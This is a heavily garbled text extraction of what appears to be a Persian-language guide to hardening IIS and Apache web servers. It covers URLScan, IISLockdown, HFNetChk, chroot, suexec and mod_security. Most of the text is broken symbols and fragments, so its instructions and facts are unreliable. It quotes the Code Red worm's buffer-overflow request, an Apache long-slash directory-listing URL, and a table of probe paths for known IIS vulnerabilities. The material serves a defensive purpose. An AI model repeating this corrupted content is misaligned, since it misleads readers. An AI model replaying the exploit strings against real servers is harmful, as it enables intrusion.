"
-,6
Ÿ
= B* A) 2 ,
6 3 ;. %LY
j 5
7 !89 ,
‚
ISAPI
: 56
+.HTR ? )&' 0 < 5 -
-,< ?@ ? j 5 ;! ?@ 1P
H GLOBAL.ASA % '
-,6
6 *
') PRINTER
'
@ MR / (,! ) , < TG' g 5
6 D l '-, ,! 78#
, <
^
I'/ IIS
)
< <N
DLL
@
F
0,
- 56DLL
I'.
@ )
6% ' 6 4
B'
<
15 / 785/ "
:A ISAPI DLL+ A
$@
CVA6 A
&2S
AA
@
A
<: $8S& IIS:
+ $A
8
#
$
h6N 0
:;d > 3 b
;
#d
>>
@
MN( d28
<< 8 :
2
)
<N ; !
,
6% ',
B$,
a,
,
-,6
T G' g
COMPUTER ) $, <
?@ 5<
"
6DLL ?
4h
U $,
DLL
PROPERTIES U
O*
)
•MASTER PROPERTIES
•WWW SERVICE
•EDIT
•PROPERTIES OF THE DEFAULT WEB SITE
•HOME DIRECTORY
•APPLICATION SETTING
•CONFIGURATION
•APP MAPPINGS
?@ ) PRINTER ,
4
B'
MSW3PRT.DLL % '$
%#<0,
N
<N
6ISAPI DLL
@
F) ISS
N56
6DLL - 56
@"
MR/
<
"
&2
<N
R4 S @
>G " T),F
, <
0
& &H
" %# < ,
-
P
1
^
?
<
+
! "
ACTIVE
SERVER
.ASP
BUFFER
PAGES
OVERFLOWS,MS02-
FUNCTIONALITY
018
WEB-BASED
.HTR +.HTR
PASSWORD RESET
SOURCE
DISCLOSURE,MS01004
INTERNET
.IDC
6
DATABASE
?
#
<@
Q193689$O)
CONNECTOR
SERVER-SIDE .STM,SHTM,SHTM1
'
INCLUDE
&
MS01-044$ )
INTERNET
.PRINTER -
'
PRINTER
&
MS01-023 )
INDEX SERVER
.IDA,IDQ -
'
&
MS01-033$ )
FRONTPAGE UNINSTALL FPSE
SERVER
EXTENSION
REMOTE
RAD SUPPORT MS01-
IUSR
'
&
RAD
035
SUPPORT
' ) # HOTFIX )PATCH
ISAPI DLL
+'
,
&
N =B*
<N
6
6 g8 0
F)
MS01-026,
-
-
R4 S @
1
),<
6PATCH " ,
-,Y
-, @
6-,
5< #
@ 78#
ISAPI DLL
, -, < ,
)
SL B )
6%
4 MR/
ISAPI DLL 78#
P
9
6S
%
B
5F " 0
F) 78#
N +'
' ) #
‹
R4 S @ () , 7
B)
@]
4
,N
-
%/
N
<
') #
A &
microsoft security bulletine
5<
6 g8 2 " ( ,
6 _, <
0,
,4
' ) # $, ,F 6PATCH
0
-
pqqwT
R4 S @ ?@
")
_HFNETCHK.EXE]
Š
j 4
HFNETCHK # " % P
H P
10, 6
-, < -
A &
' ) # -
6? ,
6
?# 0, K5 SL
' ) # b
-,< ( E
-, < K
6
<
"
(N
"
")
0,6
(E$
-
'
("c$
- Y IIS - 5 PHP
P ),
6
" #
GF
F
l '7c L.
? @ ) - @ T L.
) UPDAE WINDOWS
6U )
(N
$ ' ) #
6
-, < 'X 7c L.
g] -,< 'X 7c L.
2 ),
\) <
-, < 'X
6
)
HOTFIX i:
3 7 !89 , # j 4
-, < K PATCH 2 3@
:
5 HFNETCHK
6
XML B
X !
P
1
#P< HOTFIX -,
K
) PER1IIS,COULDDUSION I
"
1
6 #P< "
6PATCH 2 3@ -
- N4"
PATCH ,
I
5< IIS )
) SERVICE PACK A & ) ,
b
g8 2 p• -, 6 ?
6PATCH % <$
bP ) ("c
? ,
IIS
("c ) - P ' ) #
0, 6 ( E C
IIS
3
_ ') #
URLSCAN,IISLOCHDOWN " - Y
ISSLOCKDOWN WIZARD (
, #4
0,<
)“CUSTOM’
3 &
1/
IISS L
d*
6 '$ IIS SL
a
T G'
g
0
ISS
$
l '
^ P
6U )
5< -, 6 U )
&
d*
F
3
:
' ) # $pqqw T
j
$ ?@
I
7
"7
B, 6
"
3)
: 56)
%
4
IIS
“EXPERT“
u?
u T5! ?# $ S
-" Fa
2, 0 5
)
•
P
1_NNTP,SMTP,FTP,WWW],
5
network hotfix checker
5< I
- 5 -, < K
b
C 5!
6
5 MR/ )_,<
T) ,
5
7
< " $O)
.
6 ISAPI
•
?@
F)
+ 2 `56) IIS
Z F " O) -, 6 U )
0_TFTP.EXE )CMD.EXE I ]
g
%
N ]WEBDAV ? 5 T G' ga 'X
b. #
EXTENSIONS ?
- Y ?5F
gaSCRIPT
5 T G'
MAPS•
_PRINTER)ISM)IDQ)HTRa I ]
@ 2' R ) IIS
CP
-
-, < -
1 c
6
' B
H" %
6
3
5 ‚,
>G
P
10, <
? 5
% !
N
5
E
6 PF -
) 4
3 7 L*
"
IIS W
L*
#4
#B
5! )
O) -, 6 U )
) %
9
?
B
F
5 ) ,<
-
& aURLSCAN•
B'
ˆ 6 6hotfix) SERVICE PACKS L -
,
# $,
,
6 "
@
ˆ6
)
IISLOCKDOWN0,
&
6 PF " )
S L
) "
"
,
2
,F 7
# ?@
6& ? "
URLSCAN$
-,
5 (E
, "), )
IISLOCKDOWN
#4
3
IISLOCKDOWN0
0,< %'g N
@"
@
I'. ˆ 62 `56$, 6
) L*
) X
? 5
B3
URLSCAN
L ,
P
1
5<0 < SL _IISLOCK.EXE] IISLOCKDOWN
a, 6 ( E
C:\>IISLOCK.EXE/Q/C/T:C:\LOCKDOWN_FILES
IISLOCKDOWN n 9 " URLSCAN SL
,<
N A)
0 < SL ,
,
,
'
-,
ISAPI
3
5L ) ,<
37
URLSCAN.INI)URLSCAN.DLL % ') % < URLSCAN
,<
,<
P
1
B' URLSCAN.DLL0
IIS # " % PH ) ,
,
% 5! % K/
H$SL
,
?56
H IIS B
F
)
# 4 % ' URLSCAN.INI ) , % B
.
' R4 URLSCAN ISAPI b
, PHTTP
3
@,
\
$,
% ' P
1]0 <
- 3•SL
URLSCAN.LOG (
?56
3•URLSCAN.MMDDYY.LOG(
-
2 #5 A &
HTTP 404 OBJECT NOT v 4 ,
HTTP
4
P
[
FOUND
'
5 URLSCAN , # 4
3
6
URLSCAN_ <
3
0,
"
% '
?
a 'R ,<
_- g ) HEAD)POST)GET,
7 5B ]
-,<
,
5 H2
3
3
, , 6 3 ,G ;/P ] V #
<) h
…
4h
…
6URL h
…
B',
-,< &
_,<
6URL
NON-ASCII
6
"
3
: X
nP9 ,
6
>/ h
…
3S
>/ h
…
6, @
>/ h
…
W L*
F) d *
6
4
2 " (,
6
0, < <R URLLSCAN.INI % '
6)
<
&
IIS ?,< F ? "
,
0 < " , - - ) IIS
<
b' URLSCAN.INIa #
T5!
" b'?@
#P< 6"
,
7
"
B') ,
-
B)
N
" ?)
5 ?
, 4 bB
4
2 ,@
#6
,
)
F
?
T/0,
)
F) 3 -,
B' ?
,63
B $
H
5
2 )
0,
•
!"
" #$ %
-
0
H % PH "
TCP SYS
&
4
%
7
) )
z 3
%
j @
N$, 5
)$
<
* +!
- 4
& 21
)
H
@ &F
b'
' (!
"
)
5 0% F O) )
?@ -
B'
26• c 5G
6 F) 3
%3 " 7 9P
-,
u
(E
^P
#P<
6
3
6
,
< 5 V B, @
], <
%3
\)
<
6
?)
3
,
* 4
,
E
2
?# 2
P
1
)
)
_€ Y
+ H) P[ )
V ,
-,
•Y
? )"
H)$
)0
\X
&
2 ?, 5 ' B
IDA/IDQ ISAPI 6,
4 )
6-,
<N
NIMDA)CODE RED (
2 0,
% )
) pqqw T
+ H) P
[ % ',
,
"
3)
- 1
@
"
),
'
)
#
"
B
5/
' &
f
2
, ,F
, 1 ;!
? < 3 6h) ) , 56
&
2 "
R4 S @
. CODE RED (
P
< B
3,
<) " N
ISAPI DLL
TP $,<
-,
6)
,
"
pqqp
-,< - 1
@‘
‘
6)
GET/DEFAULT .IDA?NNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNN%0U6858%0UBD3%0U4570%0U7801%0UU9090%0
U6858%0UCBD3%0U78%0U455%0U00000%0U00=A7
0,
E - 1
@
\X
%SYSTEM%\NOTWORM
2 -, 6 ?
- 1
@ CODE RED (
2 `560, <
,4
u( 2
,<
7# 2
N4
@V#
3
<
0, 6,
9
2 -, 6 ? $
-
+ H) P
[ 6% ' 5I 7
0, <
; +!0x90 0x90 %u9090 # :
,<
% ' ROOT.EXE % ' >/
- 1
@
6% '2 `56),
560,
>/ TQ ? !
X /T /
"), ) % < 7
NIMDA(
,<
)
% ' ,G 2 `56NIMDA)CODE RED
6
-
./0
(
7
,
)
H?
,
"
,
8
+
5 5<
,
+1 2 " 34 5
6
nop " @A x86 =
U4
4
78
> ?
8
6-
"( 7
<
-source code
#' , <
,
:B
g e '2 0
N
,
6U
a
"
SQL 7
,
‚, <
"
5 5 <+
% 5< 6:3 2
B)
-
-N4
'%#
IIS
6, ?,
5! "
^P
1#< 2
4
.INC
@?
0
!89$% 5 h @ ,
T5!
,<
6,
(
?
4
)
j 4
I 7
R4 S @ ?
2
" %P
H U 40 , < - @ ,
R4 S @ ) , <
-
85/ 2
& 7 5B…
INCLUDE
B'" - Y …
#
.
#
)
?)
0,
0
6 3 ;. %LY
<) 2
9
"
R4 S @ ^
@ +'
F
6N 4
,
)-
,4
N -
#
3
,G ;/P
HTTP GET
R4 S @
OK(/DEFAULT.ASP
/DEFAULT.ASP+.HTR
+.HTR SOURCE DISCLOSURE
ERROR
PERFORMING
MS01-004
/FILE.STM,.SHTM,.SHTM1
WEB
QUERY
500
j 4
2 ? N
SOURCE MUST BE PRESENT
500
# , <
R4 S @ v 4
j 4% H
200
I'.
3$, 6 ( E 5< B
!
( ,H
-
3 #P< I 7
?@ " ?5F
?
7 .X …
?5 3
,
"
#
7 L
u2 & N
Y* 7 !89
6 <…
< ASP
00 ) & 7 5B$
,
S#
2<) ) iX ) ?
GLOBAL.ASA % ' 2<) ) .ASP,
`@
H U ˆ6,
>G ,
0, <
)
d*
INTERNAL
ERROR;HTML
ERROR IN WEB
SERVER
DIRECTORY
PATH
DISCLOSURE ,Q193689
/NULL .PRINTER
.PRINTER
CONTAINS
BUFFER
OVERFLOW ,MS01-023
PRINTER
INSTALL
200
OK;HTML
CONTAINS
/NULL.IDA,IDP
INDEX
SERVER
BUFFER
THE IDQ FILE..COULD NOT
OVERFLOW,MS01-033
BE FOUNS
200
OK;HTML
THE
CONTAINS
FORMAT
/NULL.HTW
WEBHITS
OF
SOURCE
DISCLOSURE>MS00-006
QUERY_STRING IS INVALID
200 OK (/FILE .STM MUST BE
/FILE.STM ,.SHTM,.SHTM1
SERVER
PRESENT)
501 NOT IMPLEMENTED
SIDE
INCLUDES
BUFFER OVERFLOW
/_VTI_BIN/_VTI_AUT/FP30REG.DLL
FRONTPAGE
SERVER
EXTENSION
BUFFER
OVERFLOW,MS01-035
a+
1-HACKING
EXPOSED
–WEB
APPLICATION
,JOEN
SCAMBRAY,MIKE SHEMA
2-WEB
HACKING
–ATTACKS
DEFENSE,STUART
MCCLURE ,SAUMIL SHAH,SHREERAJ SHAH
3-WWW.SRCO.IR
a ,
, < +H ) B
5/
6
ˆ60, -,< F
2
)
') G O)
R4 S @ " 5<
(E
)
6 )
?@ n 9 "
@ )
6
2#5
N
,<
" 7, ,
5 $,< 62 ) #.
)
2
2 `560 <
& 21
)
, LH E
)
6)
B3
0 )
$
6$ O)
()
R4 S @ )
< ;. NETSCAPE) IIS)APACHE? `56
R4 S @ -, 4 2 ,
N N %B
. ) DOS1 785/
6
) 'G U
)
6,
H
@ 15G )
5!
0 "
0
785/
1
,
N
–denial of service
B3 X / T /
,
G1:
$, < , Y -8
j * 2 5<
56 ‚, <
,< 6
N,
)
') )
-
)M
6 #< TP
BPH "
3
,
B3
,
/
? ) "
# TH
APACHE
0
)
5
O) ? , 6 U )
78#
4 $_IIS]
) %K
0
CA-2002-17,CA-2002-]
=GX
-
0
6 ' " 7, ,
-
R4 S @
? `56) <
R4 S @ ^
bP
!
)
h / 6-
_
?@
l '? #
4@0, <
-)8!0
4@ -, 6 U )
- Y "), )
I =B*
R4 S @ ^
B!
? 5 TG' g•
,
] -, 6 U
•
4@
6*
? '- 9*
H U#
1) U#
N
&
)j 5•
•
#
"
R4
) - " -, 6 U )
4@ Z F
PL $ U
6
) 6% '2 3 , - 9*
3)
-)8!
6 „ 1 # $_27
_DOS] U )
e 'j 4 7
F)
& O) -, 6 U )
"$ ?@
6*
&
)
6
"
5
" ,G )
?
4@$
" \ 2 0 5 SL & , 5
0,<
7
3 O) 7 .Y
-
H
,
)
H8! h
?8'
6
,
<R 2
3 F S1H ) ,
9
,
?@
APACHE
1
)„
,<
- *1
"
APACHE
1
)„ 2 56)
Pc
3W 3
e ' ) #17 E
E
3
- *1
ORF 3
.Y ?8' ) , -,6
4@
O) -, 6 U )
& PHP)CGI
R4 S @ ^
F) 7
a
') #
3W 3
# _APACHE]
"
4@ , ) 6T)„
3W 3
S @^
2 1
),
T25&
,
! X
I 2
) 7 .Y
0,
,
3 ,
-,6
7 .Y j 5 ) / 9
y
,
, 6, -" F , P 4 \ X
2
#
0 ,6
H :3 e G
0
)
6
5 ) TQ
c 9 6SLASH B )
) MOD_DIR,MOD_NEGOTIATE
1
)„ ?
"
?
1
6URL 5F
c 9
MOD_AUTOINDEX
? 56
. APACHE
R4 S @ 2 0 ,6 j 5
2001 h
APACHE 1.3.19 *
A8 ) 8
1P
5
1)
B "
URL
0
B3 j
Y0
"
B "
,4 P
B
g O) )
- 4
GH ) , G0, 6 j 5
?@ B )
#
5 APACHE 6 )
,
2
0,
A"
1
2<
?
< Y,
E
#0
& URL
:&i2L + $0@
, #4 B)
%#
1
)„ 0
) e
'j
)$,
.
'
H )
,
APACHE
'&
F)
2 %/
(,
6
)
APACHE #
) $,< , 4
B1 ˆ 60
-, @
"
H APACHE )
1
)„ 2 0,
MR /
# 0,6j 5
0
B
2
MOD_DIR)MOD_AUTOINDEX
47
1,
,
Q
0,< +' APACHE 1.3.19
2
<+
2#5
1) ,<
8000 "
4
?
? ! $
B
B3 PERL
B
5/ 2 -
"
? 5$
/CGI-BIN///////////////////////////////////////////////////S
7) Y
;!
MARTIN KREAMER
- '4j 4)-
" ,G
<
93
@ APACHE ?
%
, 6, j 5
? "
3 O) )
,
- Y ,
1
)„
N MR/ ) 1
[ROHAN APACHE]$./CONFIGURE –DISABLE-MODULE=DIRDISABLE-MODULE=AUTOINDEX
APACHE
2
,
60
#
', 6 3 B
H" 6
Y
0,
Y1* $ ,
? ?
)
B)
-
"
1Q
2
P10
3
<8 6
6 BH 2 , ,F
,<
1
2001 c F
n 9
, $
APACHE
0
1 " ,<
6 3 P
.
,Y
(5
[ \X
1 ,6 *
-,< e !
'?
B
,
1NETCAT
6
PASSWORD % '? 56c /
"
)
F
3
B
5/ 2 0,< A & BUGTRAQ
0, <
-, @
# 2
O)
,
" KEVINb
,
a,6 j 5
B
APACHE)MULTIVIEWS
R4 S @
)
) X
,4
BRASSCONNON.NET
"
,<
4
, -" F ?), APACHE0
$ )
"
MOD-DIRT)„ MR /
2
F) 3 P
1
,<
6)
6
\ 2
B'
R4 S @ 2 0,<
0,6
MULTIVIEW
'
?
B -
, P
-
) X
g
B'0,
- N`6
, P$, <
V4
?)
2 O) ? , 6 G
5
#
"
H) 6
2 \' 21
)
0 < - 3•
B' 6)$
?
1
0,<
?P 4 * $ 5 ,H
R 4 S @0,<
<
F)
@ ?)
6
% H
6
)
B)
,
,,
h / 6-
MOD_AUTH_*SQL j P(
<) STUTTGART- N
?)
_¤]
7
,
2
P
10, <
0
iX
SQL
-" F ?
" RUS-CERT,2001
1
)„
4
2 56)
<
6" / ?@ 2
0
-
6 3 ;. %LY
@
6" / N N
R N F O)
,
"
9
-, @
3
\X
MOD_AUTH_*SQL
• ("c
P
10,
")
0,
,
APACHE ,
R4 S @ d *
- . W L3
a
- Y
! ". /0(123&
("c 7 !89 S
)
6h @ " ?
$
"
6 @
I5
4@ O) -, 6
APACHE 1.3.X
h @" ?
1
2 " U4
+$
U)
@
MOD_AUTH_*SQL
- Y
", - - )
SQL
P<
•
:
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-13
h @" ?
APACHE 2.0.X
HTTP://WWW.APACHEWEEK.COM/FEATURES/SECURITY-20
)
R4 S @ d *
" - Y
0,
<P
0
,Y
- .
I 5 ("c
'7 !89
G X) Z
W
K
a
6h @
("c 7
4
& HTTP://HTTPD.APACHE.ORG/a h @
"2
APACHE O) -, 6 U )
0
L3
$-,< - <
"7
K
4$
"7
"
4@ O) -, 6 U )
4$
DY/ B
<)
DY/ I 5
4@ O) 2 3@ SL " ? 59…w
HTTP://HTTPD.APACHE.ORG/h @ " ?
5 - Y levels PATCH) 6 *
h @" ?
4@
:
GX) 2 3@ "
2
6@
Q CODE SOURCE
6*
…
I5
I
…
0 5 - Y HTTP://WWW.APACHE.ORG/DIST/HTTPD/PATCHES/
? @ " +F ? !
.
I
4@
% !
) X
- <
R4 S @ ^
1
)„ C'
# 2
"
$
.
-
"2
% 5
0, 5
6-"
$ -, 6 U )
O F$
4
0
? G
“/“
- Y
G',
% '
5 -,6
6
c
H,
), . $ l '
(
:
?@
), .
-)8!0
0, @
#
0 5
?@
'#
,6 *
6U )
H CHROOT/HTTPD|
0
LOGIN SESSION
"
5 )
?# $, 5 " g@
3
6- Y Z
6- Y
#
6 '
) -, < -,
F
W L3
$l '
3
6j*
G',
c
2#5 $
) -,< -, 3 'SHELL
",
8Q0,
C
L
3 'SHELL
15 / - Y Z
E /CHROOT
1G') Z F CHROOTED 7
S
2#5 $
$
,
6
F W L3
4@
F) CHROOT " z 3 ) % !
15 /
F
3
<
4@ -, 6 U )
F CHROOT b .
8Q0
C
)
F & 7
I
)
G ; ! CHROOT
CHROOT0
5<
l '-)
B 4$ CHROOT…‹
,E =
,4
2
W 3 ^ P>
F
) ROOT
? G,
F " …s
E " E %H ,/ W 3 6)
- ),. ,E = G ;!
)
#B
5!
4@
0 < ,6 *
/ 0
- Y
- 5 - Y _CA-2002-23] OPENSSL
) ,
) X
4@
2
5 MOD_SSL(CA-2002-27) (
%
I 2,
F
("c :
("c0,
0
)
!PATCHING " ? 59…p
,B
F
S
4@
2, 0 < ,6 *
5 ? G0
5 ? G0
H CHROOT
E
E
15 /
/BIN/SKY
4@ CHROOTING
)
!89
, "
?@
I5
<&
$ CGI,PHP
6
6U)
,G
+P
-
^ P
6 A) 0,<
< TP,
&'(
7,
3
?@
#
P )
"E
6 ,'
1G'\
6%
6
•c
4) 6
S
, ?# $ S
!89
,
)
BH$
@
R3
4@ -, 6 U )
0
'#< ) [
6 '$ -, 6 U )
< $
, 5
'
K LOGGING
0, 5
(E
2, 0 <
I 5 …Š
) -, 6 U )
("c 2
40
6% '
+
K W L3
?#
" W 3 I
) 1
)„
F) CHROOTING
<
B
K
LOGGING 7 B
5!
g
*
("c 7 , 5 ? @ &1
R 4 M :G
H
9P
("c$ O) -, 6 U )
2#5
F %K W L3
I
6 #6
-, 6 U )
W L3
c
("c
P F7 [ ,
b.
F 3
- Y $ 9
1G'W L3
("c 0, 5
B
:
I 5 O) -, 6 U )
? G$ I
)
# 2
:
6% '
7 L
g
'
)
F 7 !89
a,< ,6 3 6 '? @
a 5 - Y
"+
" ,
•c 7) Y
h @ " APACHE
6
'
)
<@
I5
1.3.X
…
< HTTP://HTTPD.APACHE.ORG/DOCS/LOGS.HTML
APACHE
HTTP://HTTPD.APACHE.ORG/DOCS2.0/LOGS.HTML2.0.X
- Y
0 <
•c
P
) F
6% '
.
2#5 -, @ j 4 ^ <
) CGI,PHP "
6 „ 1#
&1@ ? j &' I 5 ?
•c0 5 POST,GET
^
MOD_SECURITY n 9 " ,
6•c
F
#
)
)
)Y
l ' GX)0,<P '
,, $
- Y
#
P
[ ( ,H $
=GX
" - Y Z
POST ) GET
bP
7 B
5! ? 5
0
R4 7
_DETECTIOMN INTRUDER] 2 5/& d *
l'
0, 5
N 4
K
F
O)
S
W L3
j< 4
" $MODSECURITY0, 5
U)
MODSECURITY
)
("c
6
<
6 'O)
N 4 ) ,<
O) -, 6 U )
6
^P
- 56
F
0, 5
5/
"
4@ -, 6
-HTTP://WWW.MODSECURITY.ORG/
•-HTTP://WWW.SECURITYFOCUS/17064.152.44.126%20152.44.12
6
) SSI,CGI,PHP…•
#
a
,F
) X #
N ], K5 TG' g
4
#
I
,!
T G' g
2
<
F) ? @
:
SERVER SIDE INCLUDES
",
3
:
) SSI,CGI,PHP…
6? "
_,<
Z
"
6,
F ;! ) ,
6 '-, 6 U )
SSI…
" - Y
0, K5
) SSI,CGI,PHP "
#
6? "
#
F ? # $SUEXEC0 < - Y SUEXEC "
6 ' APACHE USER ID
H
^
, 5
6 '
USER ID
, 6 3 MR /$ ? 5F
7
7, , S
b
, < ("c j
SETUPID ROOT
,
4@ .
. CGI)SSI
L 3 CGI)SSI
) 6 @
3 <) S
SUEXEC " - Y )
/ 0, 5
6
F
3 '
6
F)
, # 4 (,!
#B
5! - .
)
6- Y/ ")
<@
- Y
;!
I ) :
a 5 - Y
a <
- Y
6
SUEXEC " -,Y 0, <
(
0,< ,6 3 N
h @" ?
- Y
2 , 0, < O ) -, 6 U )
-, < <
P
- 5
?# 2 SUEXEC
4@ ?
…
$
USER ID
%
P 7) Y USER ID
2 < ? # ) j6
) X #
" h @ " APACHE 1.3.X
3
2
"
6
…
HTTP://HTTPD.APACHE.ORG/DOCS/SUEXEC.HTML
a <
" h @ " APACHE 2.0.X
- Y
…
HTTP://HTTPD.APACHE.ORG/DOCS-2.0/SUEXEC.HTML
) CGI-BIN
% <
,
MR/$
5 e 'j 4
6
. W L3
#
5
("c
…
("c ) ( E 6
#
PHP "
) -
z 3 1 2
B / " S1:
a
0
HTTP HEADER
F
- < W L3 2
7 !89 K ;!
SAFE 1/
h @ " ?
W
l '\ X
L3 2
23
5 )
K6
PHP
25
4
C
'
4 ? 5 TG' g…
F " ? 59 T L/…
B5# 7
!89
'
HTTP://WWW.SECURITYFOCUS.COM/PRINTABLE/INFOCUS/1706
T)„
8Q 0
G X)
XSS:CROSS SITE
" ?
W L3 2
P
%
I
'X
)
…
MOD_SECURITY
DY/ ; ! ,
B5# 7 !89 -,6
1
)„ " - Y
0 < SCRIPTING
<@
0 5 - Y HTTP://MODSECURITY.ORG/ h @
SQL INJECTION &XSS % < R 4 S @ ^
( 0 5 - Y
h @
2 P
h
,G
6
6 & " ?
:
) &5 …
0
56 &K/ &
H]NIKTO &
%
"
2
#
'
# _HTTP://WWW.CIRT.NET/CODE/NIKTO.SHTML
0
CGI
) j 4
6&
R
Y
9f
!"
#"
$ %
!"
1
23 4 0
&'(
7 !89 "
0
25
?#
A
5L M 9
N M 9" ) , < % !
) !
$ @)
F 7, ,
6
&1@ )
(E $ F
: ),
6
-
% !
"
/)
56% !
-")
) 'D
? ,
, - .
6;. " -
56 $
) 5B
!C
8
%K
&' * +
:
-,< =! > ?@
J
)
# $% !
GH )
5 2'
O*
! 5E 2 '
I
I
H? "
?@
P 4)
,N
0
,G
R4 S @
3W 3 P
B
9
2
F) % 1 $
' ?5F
' 785/
0
T) , % !
) - 5 - Y $-,< 3 <
, * $ 3 M, 6
" 6
%
(
$O * 7
2 5
"
^
L )
?5F
6 @ 0, 5
" - Y
H7
E )
F 78#
2 5
=GX
F) B
! $ R4 S @ ^
R4 S @ d *
? &560
"
6&
$? 5F
) 6- Y/]
Code Red )
$7 !89
:
6A) "
$\
R N6 2
$% !
3
0,
F %K
? @ > GP
8 $
Ba I K6
6
?
" V,
I 5 ,G
* $M,6? G
) X
)? "
R4 S @ ^
K
0, 5
#P
<
"), )
- .)
& 5
Q
6U )
) [
3 _ R4 S @ ^
N &1@ ) K < 0
c
-
) 6? "
N` 6?), ) - # M 9
6
=GX - Y Z
I
,
) 6(
R4 S @ ^
<
b
R4S @
I 5 -, < 2 ),
5B
! 7,
0, <
S
0,< ,6 3 K
c
! 5E
6 'G " U4 $
2
0 3
% !
6
$
N 4
) B
6A) $, , e G
$ R4 S @ ^
"
6%
DY/
4 63
R4 S @ ^
2 5
$_ 1 f 4] "), )
0 3
R4 S @ ^
F) " [
&1 @ ) K < 0 )@
h <
6 A"
? "
,
)
"
? ,
0
=GX
-
"
)
6 S
"
6
! 5E
1) U#
- <
F
4 ) A8 % L/ $% !
7c
9 $U
785/ ) 7 , , SB
g $,
- <?@
R4 S @ ^
,F 7c
6 '? 5F
#P< )
0
4 63
bP
56
% !
6
? F i:
R4 S @ ^
-, " )
0, 6 ( E
("c 7 ,H ) <@ ? @
% !
6
F
6
!
R4 S @ ^
3
I 5 ("c
6%5G1
% <)
bP
B5# ) , Y 7 !89
K6
4
1
&'( )* !#+
i:
-
K6
F
-)
-")
-
F
0, 5
"), )
-
? F
25F
b
% !
6
, G 785/ ?
- Y % !
R4 S @ ^
f
? G _7) Y
2 5
?
"
0
# "), )
- Y
G )
6 * ] "), ) "
$-,< ( E -
)\
a 5
• Internet Information Serveces (IIS)
• Microsoft SQL Server (MSSQL)
• Windows Authentication
• Internet Explorer (IE)
• Windows Remote Access Services
• Microft Data Access Componenets (MDAC)
• Windows Scripting Host (WSH)
• Microsoft Outlook Outlook Express
• Windows Peer to peer File Sharing (P2P)
• Simple Nerwork Management Protocol (SNMP)
785/
-,5!
] MSSQL ) IIS
6 3 $_) )
$ 1 2 T) j *
0 3
4
&'( )$,% * Internet Information Services (IIS)
3
IIS
R 4 S @ $e 'j 4 , # 4 ) 7 5 I
a, 5 6 '
" 7, ,
",
) -,
_
3]
G
0, 5
I K6-, "
4 j 4 0, 5
N ISAPI
7 B
5! ( E
- Y $O)
Y 6ISAPI
6 B'" $IIS 0, 5
,F ) W 3 7 B
5! (&B $ISAPI
_SL ]
IIS SL ? "
)
Code Red, Code red 0, <
P 4
F
- Y 0, <
- Y
V < ) Server Side (SSI) Includes $Server
Pk
) - PSL
3 M ,6
4 " IIS
K6% '^ P ) N P56 I 5 _ <
bP
0,
23 , - 9*5 •
%
K6% '] ISAPI -,< 3 < %
ISAPI " PHP ) Coldfusion
Active
ZF•
37
-, 6 U )
W 3
,G
) 6% '23 , - 9*5 ) j 5 •
h / 6-
DLL O G
7P
[
? 5 TG' g •
_DOS] b)
6 B'? @
SL
? 5F
l '=GX "
b
" ,G
) e 'j 4 7 L C
85!
- Y Z
,<
6 B'"
O *
% H $l ' 6 B' Q
6
"
K6
5
0, - 5 - Y
5
l ' 6
/ 9
H F
,1 )
" ) -,6
,
6
P! &
I & IIS
% < $O) ? , 6 U )
0, -, < / 9 $O) -, 6 U )
B
5! b .
? # IIS - 5
< K
I h / 7 !89
7P
[
I5
%K ? 5 m.1 ? @
#B
5!
6
K
5 "
) - "
3
0
) - *1
0, 5
6'
'N
6% '
N " $ 1
) SL " U 4 IIS S
ntdll. Dll Web
R4 S @ ^
) 6 ' _U )
? 5 T G' g] Dos \
U)
)
8Q 0 )@
C
3 I
H ? 5F
$ F
6 ) nH
6
3 ], <
6 ' ? 5F
F
"
" 785/ ? # IIS5.0
#
R4 S @ ^
, N ) ( N (, !
F) E
F
H
?5F
) N
-, 6 U )
)
DAV
0,
-, 6
3 - *1 7
F
0_URL
SL IIS )
7 ) X
, ,F R 4 S @ ^
=GX
o
F)
F
")
) i.
)
K6%
, # 4 (,! % 1
, ,
& IIS
], 5
4)7 #
& PHP, Coldfusion
",
$ R4 S @ ^
,<
0_ N T L.
-, < SL T L.
T L.
T#< )
"
6=GX ) 78#
- Y IIS 5.1 *
0, 5
- Y IIS 6.0 "
pqqs "), ) )
G:H 785/ %
IIS
K
,
# )
-,
7,
) ' ) #
I5 ?
:
0 5 - Y
2 ) % <
' ) #
2
< IIS
1t
K A & ?
L IIS
0, 5
#
S L ?@ )
#P< )
3
0, 5 ( N IIS S
" IIS
^
? , 0
6 & 2 , ,F
&
:
0 &'( )3 45 678
R 4 S @ $, < -,
, N $S L
XP"), ) •
l ' R4 S @ :
) e 'j 4 7
l '
pqqq "), ) •
Professional *
"
!"
) SL
NT 4.0 "), ) •
-, 6 U )
0
6Patch
0 1 !"
- Y IIS 4.0 "
- Y q$r IIS "
0, 5
I ] 0,
N 0, 5 6 '
2 +. /
0, 5
6h @
,
bP
Baseline Securiy Microsoft Analvzer
,6 3
$,
-, !
:
-,<
7,
0
4
GX)
I 5 ?@ " ) '
,G
!89 +
K
3j
$
F
-,< -
IIS
GX)
("c
') #
#B
5!
0
bP ) S
b
R4 S @ ^
. " $ 'S
+H ) , Y
Cheklists a I -,< K
,
"2
" - Y
,
$ B
/
, ,F =GX ^
Auto Update , windows Update 0
0
6Patch 2 3@
-,< K
,6 *
6Patch
6
h @" ?
'
IIS "
) - "
l
X !
) - @ T L. 6
Update ? #
^
Patch "
) X
I5 S
) B
.
*
I
K6 &
)j 4
2
3@ 0,
-,< K Patch 2 3@
)
b
6
6
("c 5
K
XP
<
" #
- Y IIS - 56 PHP
("c 0
5 SL
IIS
-, < 'X
6
:
Patch % < $ ' ) #
_ ' ) #
1
)
http://www.microsft.com/technet/security/tools.hfnetchk.asp
6? ,
' ) #
(N
K
- Y % H l ' & 0, 5
' &
) Perliis, CouldDusion
"
'
!
"), ) ) pqqq "), ) NT 4.0 "), ) )
0
6Patch
Checker Network Security Hotfix (HFNetchk)
? ,
F
9:; 678
5 ( N $-, < K
- Y
F
# O B
:
26= $> Patch * <)(
1
)
=< 7" 5 0
%
)
) ( N6
K6A) "
Patching 0
-, < S L -, 6 U )
<" @ 7 ,
6, @ '? 5 TP
&'( )$,%
IIS
DY/ 6
$ #P< ? , 0, @ %5G - Y IIS
" - Y
i: Z
IIS
,<
-,< K
<
g] -,< 'X 7c L.
-, < ( E
"
(N
P ) GF
l '7c L.
6
F
6U )
) Windows
-, < 'X 7c L.
"
( N6
? ,
0, 6 ( E
2 *B#, (
